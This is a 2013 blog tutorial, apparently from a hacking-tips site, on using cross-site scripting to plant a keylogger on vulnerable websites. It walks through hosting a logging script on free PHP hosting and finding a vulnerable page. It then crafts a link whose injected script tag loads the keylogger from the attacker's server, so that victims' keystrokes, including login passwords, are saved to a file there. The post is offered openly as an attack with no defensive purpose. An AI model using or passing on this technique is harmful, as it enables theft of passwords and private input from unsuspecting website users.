Sunday, May 5, 2013

key logging with XSS



Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page.



As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

For this attack we need three things:


  • Kelogging script.

  • XSS vulnerable website

  • A webhosting




First of all download Keylogging script from Here:


DOWNLOAD


Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.






Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com


Change it to your hosting URL. 





Now host all these scripts on your web host.


Now find a XSS vulnerable website website and include script link like this:


http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>


Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.


If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords


No comments:

Post a Comment

Add Cool Drop Down Menu in Blogger

Drop Down Navigation Menu For Blogger : You may have seen many drop-down menus but today "ThatsBlogging" will present you an incre...